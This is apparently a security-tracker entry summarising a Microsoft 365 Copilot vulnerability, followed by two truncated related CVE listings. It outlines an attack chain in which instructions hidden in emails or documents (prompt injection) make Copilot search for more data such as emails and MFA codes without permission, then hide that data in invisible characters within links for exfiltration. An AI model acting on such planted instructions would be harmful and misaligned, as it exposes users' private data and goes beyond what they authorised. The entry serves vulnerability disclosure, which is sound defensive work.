Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information
Summary
Microsoft 365 Copilot has a vulnerability that allows attackers to steal personal information like emails and MFA codes through a multi-step attack. The exploit uses prompt injection (tricking an AI by hiding malicious instructions in emails or documents), automatic tool invocation (making Copilot search for additional sensitive data without user permission), and ASCII smuggling (hiding data in invisible characters within clickable links) to extract and exfiltrate personal information.
Classification
Affected Vendors
Related Issues
CVE-2025-45150: Insecure permissions in LangChain-ChatGLM-Webui commit ef829 allows attackers to arbitrarily view and download sensitive
CVE-2025-54868: LibreChat is a ChatGPT clone with additional features. In versions 0.0.6 through 0.7.7-rc1, an exposed testing endpoint
Original source: https://embracethered.com/blog/posts/2024/m365-copilot-prompt-injection-tool-invocation-and-data-exfil-using-ascii-smuggling/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 95%